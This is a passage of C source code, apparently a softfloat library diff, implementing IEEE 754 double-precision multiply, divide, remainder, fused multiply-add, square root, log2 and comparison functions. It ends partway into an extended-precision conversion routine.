+/*---------------------------------------------------------------------------- +| Returns the result of multiplying the double-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. 
*----------------------------------------------------------------------------*/

float64 float64_mul( float64 a, float64 b STATUS_PARAM )
{
    flag aSign, bSign, zSign;
    int_fast16_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig0, zSig1;

    a = float64_squash_input_denormal(a STATUS_VAR);
    b = float64_squash_input_denormal(b STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    bSig = extractFloat64Frac( b );
    bExp = extractFloat64Exp( b );
    bSign = extractFloat64Sign( b );
    zSign = aSign ^ bSign;
    if ( aExp == 0x7FF ) {
        if ( aSig || ( ( bExp == 0x7FF ) && bSig ) ) {
            return propagateFloat64NaN( a, b STATUS_VAR );
        }
        /* Inf * 0 is invalid */
        if ( ( bExp | bSig ) == 0 ) {
            float_raise( float_flag_invalid STATUS_VAR);
            return float64_default_nan;
        }
        return packFloat64( zSign, 0x7FF, 0 );
    }
    if ( bExp == 0x7FF ) {
        if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        /* 0 * Inf is invalid */
        if ( ( aExp | aSig ) == 0 ) {
            float_raise( float_flag_invalid STATUS_VAR);
            return float64_default_nan;
        }
        return packFloat64( zSign, 0x7FF, 0 );
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return packFloat64( zSign, 0, 0 );
        normalizeFloat64Subnormal( aSig, &aExp, &aSig );
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) return packFloat64( zSign, 0, 0 );
        normalizeFloat64Subnormal( bSig, &bExp, &bSig );
    }
    zExp = aExp + bExp - 0x3FF;
    /* Shifts of 10 and 11 place the 128-bit product so its top bit lands
     * in bit 62 or 63 of zSig0.
     */
    aSig = ( aSig | LIT64( 0x0010000000000000 ) )<<10;
    bSig = ( bSig | LIT64( 0x0010000000000000 ) )<<11;
    mul64To128( aSig, bSig, &zSig0, &zSig1 );
    /* Fold the low product word into the sticky bit of the high word */
    zSig0 |= ( zSig1 != 0 );
    /* Normalize: if the top bit is in position 62, shift up one */
    if ( 0 <= (int64_t) ( zSig0<<1 ) ) {
        zSig0 <<= 1;
        --zExp;
    }
    return roundAndPackFloat64( zSign, zExp, zSig0 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of dividing the double-precision floating-point value `a'
| by the corresponding value `b'.
The operation is performed according to
| the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float64 float64_div( float64 a, float64 b STATUS_PARAM )
{
    flag aSign, bSign, zSign;
    int_fast16_t aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig;
    uint64_t rem0, rem1;
    uint64_t term0, term1;
    a = float64_squash_input_denormal(a STATUS_VAR);
    b = float64_squash_input_denormal(b STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    bSig = extractFloat64Frac( b );
    bExp = extractFloat64Exp( b );
    bSign = extractFloat64Sign( b );
    zSign = aSign ^ bSign;
    if ( aExp == 0x7FF ) {
        if ( aSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        if ( bExp == 0x7FF ) {
            if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
            /* Inf / Inf is invalid */
            float_raise( float_flag_invalid STATUS_VAR);
            return float64_default_nan;
        }
        return packFloat64( zSign, 0x7FF, 0 );
    }
    if ( bExp == 0x7FF ) {
        if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        return packFloat64( zSign, 0, 0 );
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) {
            /* 0/0 is invalid; finite/0 raises divide-by-zero */
            if ( ( aExp | aSig ) == 0 ) {
                float_raise( float_flag_invalid STATUS_VAR);
                return float64_default_nan;
            }
            float_raise( float_flag_divbyzero STATUS_VAR);
            return packFloat64( zSign, 0x7FF, 0 );
        }
        normalizeFloat64Subnormal( bSig, &bExp, &bSig );
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return packFloat64( zSign, 0, 0 );
        normalizeFloat64Subnormal( aSig, &aExp, &aSig );
    }
    zExp = aExp - bExp + 0x3FD;
    aSig = ( aSig | LIT64( 0x0010000000000000 ) )<<10;
    bSig = ( bSig | LIT64( 0x0010000000000000 ) )<<11;
    /* Keep the quotient estimate below 2: halve the dividend if needed */
    if ( bSig <= ( aSig + aSig ) ) {
        aSig >>= 1;
        ++zExp;
    }
    zSig = estimateDiv128To64( aSig, 0, bSig );
    /* The estimate may be up to 2 too large; only when the low bits are
     * small enough to matter for rounding, compute the exact remainder
     * and correct the quotient downward.
     */
    if ( ( zSig & 0x1FF ) <= 2 ) {
        mul64To128( bSig, zSig, &term0, &term1 );
        sub128( aSig, 0, term0, term1, &rem0, &rem1 );
        while ( (int64_t) rem0 < 0 ) {
            --zSig;
            add128( rem0, rem1, 0, bSig, &rem0, &rem1 );
        }
        /* Fold any nonzero remainder into the sticky bit */
        zSig |= ( rem1 != 0 );
    }
    return roundAndPackFloat64( zSign, zExp, zSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the remainder of the double-precision floating-point value `a'
| with respect to the corresponding value `b'. The operation is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float64 float64_rem( float64 a, float64 b STATUS_PARAM )
{
    flag aSign, zSign;
    int_fast16_t aExp, bExp, expDiff;
    uint64_t aSig, bSig;
    uint64_t q, alternateASig;
    int64_t sigMean;

    a = float64_squash_input_denormal(a STATUS_VAR);
    b = float64_squash_input_denormal(b STATUS_VAR);
    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    bSig = extractFloat64Frac( b );
    bExp = extractFloat64Exp( b );
    if ( aExp == 0x7FF ) {
        if ( aSig || ( ( bExp == 0x7FF ) && bSig ) ) {
            return propagateFloat64NaN( a, b STATUS_VAR );
        }
        /* Inf rem anything is invalid */
        float_raise( float_flag_invalid STATUS_VAR);
        return float64_default_nan;
    }
    if ( bExp == 0x7FF ) {
        if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR );
        return a;
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) {
            /* x rem 0 is invalid */
            float_raise( float_flag_invalid STATUS_VAR);
            return float64_default_nan;
        }
        normalizeFloat64Subnormal( bSig, &bExp, &bSig );
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return a;
        normalizeFloat64Subnormal( aSig, &aExp, &aSig );
    }
    expDiff = aExp - bExp;
    aSig = ( aSig | LIT64( 0x0010000000000000 ) )<<11;
    bSig = ( bSig | LIT64( 0x0010000000000000 ) )<<11;
    if ( expDiff < 0 ) {
        /* |a| < |b|/2: the remainder is a itself */
        if ( expDiff < -1 ) return a;
        aSig >>= 1;
    }
    q = ( bSig <= aSig );
    if ( q ) aSig -= bSig;
    /* Reduce the exponent gap 62 bits at a time using the 64-bit
     * quotient estimate (biased 2 low so it never overestimates).
     */
    expDiff -= 64;
    while ( 0 < expDiff ) {
        q = estimateDiv128To64( aSig, 0, bSig );
        q = ( 2 < q ) ? q - 2 : 0;
        aSig = 0- ( ( bSig>>2 ) * q );
        expDiff -= 62;
    }
    expDiff += 64;
    if ( 0 < expDiff ) {
        q = estimateDiv128To64( aSig, 0, bSig );
        q = ( 2 < q ) ? q - 2 : 0;
        q >>= 64 - expDiff;
        bSig >>= 2;
        aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q;
    }
    else {
        aSig >>= 2;
        bSig >>= 2;
    }
    /* Step past the true quotient, then choose between the last two
     * partial remainders: pick the one nearer zero, ties going to the
     * even quotient (IEC/IEEE remainder is round-to-nearest-even).
     */
    do {
        alternateASig = aSig;
        ++q;
        aSig -= bSig;
    } while ( 0 <= (int64_t) aSig );
    sigMean = aSig + alternateASig;
    if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) {
        aSig = alternateASig;
    }
    zSign = ( (int64_t) aSig < 0 );
    if ( zSign ) aSig = 0- aSig;
    return normalizeRoundAndPackFloat64( aSign ^ zSign, bExp, aSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of multiplying the double-precision floating-point values
| `a' and `b' then adding 'c', with no intermediate rounding step after the
| multiplication. The operation is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic 754-2008.
| The flags argument allows the caller to select negation of the
| addend, the intermediate product, or the final result. (The difference
| between this and having the caller do a separate negation is that negating
| externally will flip the sign bit on NaNs.)
*----------------------------------------------------------------------------*/

float64 float64_muladd(float64 a, float64 b, float64 c, int flags STATUS_PARAM)
{
    flag aSign, bSign, cSign, zSign;
    int_fast16_t aExp, bExp, cExp, pExp, zExp, expDiff;
    uint64_t aSig, bSig, cSig;
    flag pInf, pZero, pSign;
    uint64_t pSig0, pSig1, cSig0, cSig1, zSig0, zSig1;
    int shiftcount;
    flag signflip, infzero;

    a = float64_squash_input_denormal(a STATUS_VAR);
    b = float64_squash_input_denormal(b STATUS_VAR);
    c = float64_squash_input_denormal(c STATUS_VAR);
    aSig = extractFloat64Frac(a);
    aExp = extractFloat64Exp(a);
    aSign = extractFloat64Sign(a);
    bSig = extractFloat64Frac(b);
    bExp = extractFloat64Exp(b);
    bSign = extractFloat64Sign(b);
    cSig = extractFloat64Frac(c);
    cExp = extractFloat64Exp(c);
    cSign = extractFloat64Sign(c);

    /* Is the product of the form 0 * Inf or Inf * 0? */
    infzero = ((aExp == 0 && aSig == 0 && bExp == 0x7ff && bSig == 0) ||
               (aExp == 0x7ff && aSig == 0 && bExp == 0 && bSig == 0));

    /* It is implementation-defined whether the cases of (0,inf,qnan)
     * and (inf,0,qnan) raise InvalidOperation or not (and what QNaN
     * they return if they do), so we have to hand this information
     * off to the target-specific pick-a-NaN routine.
     */
    if (((aExp == 0x7ff) && aSig) ||
        ((bExp == 0x7ff) && bSig) ||
        ((cExp == 0x7ff) && cSig)) {
        return propagateFloat64MulAddNaN(a, b, c, infzero STATUS_VAR);
    }

    if (infzero) {
        float_raise(float_flag_invalid STATUS_VAR);
        return float64_default_nan;
    }

    if (flags & float_muladd_negate_c) {
        cSign ^= 1;
    }

    signflip = (flags & float_muladd_negate_result) ? 1 : 0;

    /* Work out the sign and type of the product */
    pSign = aSign ^ bSign;
    if (flags & float_muladd_negate_product) {
        pSign ^= 1;
    }
    pInf = (aExp == 0x7ff) || (bExp == 0x7ff);
    pZero = ((aExp | aSig) == 0) || ((bExp | bSig) == 0);

    if (cExp == 0x7ff) {
        if (pInf && (pSign ^ cSign)) {
            /* addition of opposite-signed infinities => InvalidOperation */
            float_raise(float_flag_invalid STATUS_VAR);
            return float64_default_nan;
        }
        /* Otherwise generate an infinity of the same sign */
        return packFloat64(cSign ^ signflip, 0x7ff, 0);
    }

    if (pInf) {
        return packFloat64(pSign ^ signflip, 0x7ff, 0);
    }

    if (pZero) {
        if (cExp == 0) {
            if (cSig == 0) {
                /* Adding two exact zeroes */
                if (pSign == cSign) {
                    zSign = pSign;
                } else if (STATUS(float_rounding_mode) == float_round_down) {
                    zSign = 1;
                } else {
                    zSign = 0;
                }
                return packFloat64(zSign ^ signflip, 0, 0);
            }
            /* Exact zero plus a denorm */
            if (STATUS(flush_to_zero)) {
                float_raise(float_flag_output_denormal STATUS_VAR);
                return packFloat64(cSign ^ signflip, 0, 0);
            }
        }
        /* Zero plus something non-zero : just return the something */
        if (flags & float_muladd_halve_result) {
            if (cExp == 0) {
                normalizeFloat64Subnormal(cSig, &cExp, &cSig);
            }
            /* Subtract one to halve, and one again because roundAndPackFloat64
             * wants one less than the true exponent.
             */
            cExp -= 2;
            cSig = (cSig | 0x0010000000000000ULL) << 10;
            return roundAndPackFloat64(cSign ^ signflip, cExp, cSig STATUS_VAR);
        }
        return packFloat64(cSign ^ signflip, cExp, cSig);
    }

    if (aExp == 0) {
        normalizeFloat64Subnormal(aSig, &aExp, &aSig);
    }
    if (bExp == 0) {
        normalizeFloat64Subnormal(bSig, &bExp, &bSig);
    }

    /* Calculate the actual result a * b + c */

    /* Multiply first; this is easy. */
    /* NB: we subtract 0x3fe where float64_mul() subtracts 0x3ff
     * because we want the true exponent, not the "one-less-than"
     * flavour that roundAndPackFloat64() takes.
     */
    pExp = aExp + bExp - 0x3fe;
    aSig = (aSig | LIT64(0x0010000000000000))<<10;
    bSig = (bSig | LIT64(0x0010000000000000))<<11;
    mul64To128(aSig, bSig, &pSig0, &pSig1);
    if ((int64_t)(pSig0 << 1) >= 0) {
        shortShift128Left(pSig0, pSig1, 1, &pSig0, &pSig1);
        pExp--;
    }

    zSign = pSign ^ signflip;

    /* Now [pSig0:pSig1] is the significand of the multiply, with the explicit
     * bit in position 126.
     */
    if (cExp == 0) {
        if (!cSig) {
            /* Throw out the special case of c being an exact zero now */
            shift128RightJamming(pSig0, pSig1, 64, &pSig0, &pSig1);
            if (flags & float_muladd_halve_result) {
                pExp--;
            }
            return roundAndPackFloat64(zSign, pExp - 1,
                                       pSig1 STATUS_VAR);
        }
        normalizeFloat64Subnormal(cSig, &cExp, &cSig);
    }

    /* Shift cSig and add the explicit bit so [cSig0:cSig1] is the
     * significand of the addend, with the explicit bit in position 126.
     */
    cSig0 = cSig << (126 - 64 - 52);
    cSig1 = 0;
    cSig0 |= LIT64(0x4000000000000000);
    expDiff = pExp - cExp;

    if (pSign == cSign) {
        /* Addition */
        if (expDiff > 0) {
            /* scale c to match p */
            shift128RightJamming(cSig0, cSig1, expDiff, &cSig0, &cSig1);
            zExp = pExp;
        } else if (expDiff < 0) {
            /* scale p to match c */
            shift128RightJamming(pSig0, pSig1, -expDiff, &pSig0, &pSig1);
            zExp = cExp;
        } else {
            /* no scaling needed */
            zExp = cExp;
        }
        /* Add significands and make sure explicit bit ends up in posn 126 */
        add128(pSig0, pSig1, cSig0, cSig1, &zSig0, &zSig1);
        if ((int64_t)zSig0 < 0) {
            shift128RightJamming(zSig0, zSig1, 1, &zSig0, &zSig1);
        } else {
            zExp--;
        }
        shift128RightJamming(zSig0, zSig1, 64, &zSig0, &zSig1);
        if (flags & float_muladd_halve_result) {
            zExp--;
        }
        return roundAndPackFloat64(zSign, zExp, zSig1 STATUS_VAR);
    } else {
        /* Subtraction */
        if (expDiff > 0) {
            shift128RightJamming(cSig0, cSig1, expDiff, &cSig0, &cSig1);
            sub128(pSig0, pSig1, cSig0, cSig1, &zSig0, &zSig1);
            zExp = pExp;
        } else if (expDiff < 0) {
            shift128RightJamming(pSig0, pSig1, -expDiff, &pSig0, &pSig1);
            sub128(cSig0, cSig1, pSig0, pSig1, &zSig0, &zSig1);
            zExp = cExp;
            zSign ^= 1;
        } else {
            zExp = pExp;
            if (lt128(cSig0, cSig1, pSig0, pSig1)) {
                sub128(pSig0, pSig1, cSig0, cSig1, &zSig0, &zSig1);
            } else if (lt128(pSig0, pSig1, cSig0, cSig1)) {
                sub128(cSig0, cSig1, pSig0, pSig1, &zSig0, &zSig1);
                zSign ^= 1;
            } else {
                /* Exact zero */
                zSign = signflip;
                if (STATUS(float_rounding_mode) == float_round_down) {
                    zSign ^= 1;
                }
                return packFloat64(zSign, 0, 0);
            }
        }
        --zExp;
        /* Do the equivalent of normalizeRoundAndPackFloat64() but
         * starting with the significand in a pair of uint64_t.
         */
        if (zSig0) {
            shiftcount = countLeadingZeros64(zSig0) - 1;
            shortShift128Left(zSig0, zSig1, shiftcount, &zSig0, &zSig1);
            if (zSig1) {
                zSig0 |= 1;
            }
            zExp -= shiftcount;
        } else {
            shiftcount = countLeadingZeros64(zSig1);
            if (shiftcount == 0) {
                zSig0 = (zSig1 >> 1) | (zSig1 & 1);
                zExp -= 63;
            } else {
                shiftcount--;
                zSig0 = zSig1 << shiftcount;
                zExp -= (shiftcount + 64);
            }
        }
        if (flags & float_muladd_halve_result) {
            zExp--;
        }
        return roundAndPackFloat64(zSign, zExp, zSig0 STATUS_VAR);
    }
}

/*----------------------------------------------------------------------------
| Returns the square root of the double-precision floating-point value `a'.
| The operation is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float64 float64_sqrt( float64 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp, zExp;
    uint64_t aSig, zSig, doubleZSig;
    uint64_t rem0, rem1, term0, term1;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );
    if ( aExp == 0x7FF ) {
        if ( aSig ) return propagateFloat64NaN( a, a STATUS_VAR );
        if ( ! aSign ) return a;
        /* sqrt(-Inf) is invalid */
        float_raise( float_flag_invalid STATUS_VAR);
        return float64_default_nan;
    }
    if ( aSign ) {
        /* sqrt of a negative number (other than -0) is invalid */
        if ( ( aExp | aSig ) == 0 ) return a;
        float_raise( float_flag_invalid STATUS_VAR);
        return float64_default_nan;
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return float64_zero;
        normalizeFloat64Subnormal( aSig, &aExp, &aSig );
    }
    /* Halve the unbiased exponent; the parity of aExp is absorbed into
     * the significand shift below.
     */
    zExp = ( ( aExp - 0x3FF )>>1 ) + 0x3FE;
    aSig |= LIT64( 0x0010000000000000 );
    zSig = estimateSqrt32( aExp, (uint32_t)(aSig>>21) );
    aSig <<= 9 - ( aExp & 1 );
    /* Refine the 32-bit estimate to 64 bits by one Newton-style step */
    zSig = estimateDiv128To64( aSig, 0, zSig<<32 ) + ( zSig<<30 );
    if ( ( zSig & 0x1FF ) <= 5 ) {
        /* Estimate may be slightly high: correct against the exact
         * remainder aSig - zSig^2, then set the sticky bit.
         */
        doubleZSig = zSig<<1;
        mul64To128( zSig, zSig, &term0, &term1 );
        sub128( aSig, 0, term0, term1, &rem0, &rem1 );
        while ( (int64_t) rem0 < 0 ) {
            --zSig;
            doubleZSig -= 2;
            add128( rem0, rem1, zSig>>63, doubleZSig | 1, &rem0, &rem1 );
        }
        zSig |= ( ( rem0 | rem1 ) != 0 );
    }
    return roundAndPackFloat64( 0, zExp, zSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the binary log of the double-precision floating-point value `a'.
| The operation is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/
float64 float64_log2( float64 a STATUS_PARAM )
{
    flag aSign, zSign;
    int_fast16_t aExp;
    uint64_t aSig, aSig0, aSig1, zSig, i;
    a = float64_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat64Frac( a );
    aExp = extractFloat64Exp( a );
    aSign = extractFloat64Sign( a );

    if ( aExp == 0 ) {
        /* log2(+/-0) = -Inf */
        if ( aSig == 0 ) return packFloat64( 1, 0x7FF, 0 );
        normalizeFloat64Subnormal( aSig, &aExp, &aSig );
    }
    if ( aSign ) {
        /* log2 of a negative number is invalid */
        float_raise( float_flag_invalid STATUS_VAR);
        return float64_default_nan;
    }
    if ( aExp == 0x7FF ) {
        if ( aSig ) return propagateFloat64NaN( a, float64_zero STATUS_VAR );
        return a;
    }

    /* Integer part of the log is the unbiased exponent; the fractional
     * bits are generated below one at a time by repeatedly squaring the
     * significand (in 12.52 fixed point) and noting each doubling.
     */
    aExp -= 0x3FF;
    aSig |= LIT64( 0x0010000000000000 );
    zSign = aExp < 0;
    zSig = (uint64_t)aExp << 52;
    for (i = 1LL << 51; i > 0; i >>= 1) {
        mul64To128( aSig, aSig, &aSig0, &aSig1 );
        aSig = ( aSig0 << 12 ) | ( aSig1 >> 52 );
        if ( aSig & LIT64( 0x0020000000000000 ) ) {
            aSig >>= 1;
            zSig |= i;
        }
    }

    if ( zSign )
        zSig = 0-zSig;
    return normalizeRoundAndPackFloat64( zSign, 0x408, zSig STATUS_VAR );
}

/*----------------------------------------------------------------------------
| Returns 1 if the double-precision floating-point value `a' is equal to the
| corresponding value `b', and 0 otherwise. The invalid exception is raised
| if either operand is a NaN. Otherwise, the comparison is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
+*----------------------------------------------------------------------------*/ + +int float64_eq( float64 a, float64 b STATUS_PARAM ) +{ + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + av = float64_val(a); + bv = float64_val(b); + return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than or +| equal to the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_le( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. 
The comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_lt( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. The invalid exception is raised if either +| operand is a NaN. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_unordered( float64 a, float64 b STATUS_PARAM ) +{ + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is equal to the +| corresponding value `b', and 0 otherwise. 
Quiet NaNs do not cause an +| exception. The comparison is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_eq_quiet( float64 a, float64 b STATUS_PARAM ) +{ + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + av = float64_val(a); + bv = float64_val(b); + return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than or +| equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float64_le_quiet( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. Otherwise, the comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float64_lt_quiet( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The +| comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_unordered_quiet( float64 a, float64 b STATUS_PARAM ) +{ + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 32-bit two's complement integer format. 
The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic---which means in particular that the conversion +| is rounded according to the current rounding mode. If `a' is a NaN, the +| largest positive integer is returned. Otherwise, if the conversion +| overflows, the largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 floatx80_to_int32( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (int32)(1U << 31); + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; + shiftCount = 0x4037 - aExp; + if ( shiftCount <= 0 ) shiftCount = 1; + shift64RightJamming( aSig, shiftCount, &aSig ); + return roundAndPackInt32( aSign, aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 32-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic, except that the conversion is always rounded +| toward zero. If `a' is a NaN, the largest positive integer is returned. +| Otherwise, if the conversion overflows, the largest integer with the same +| sign as `a' is returned. 
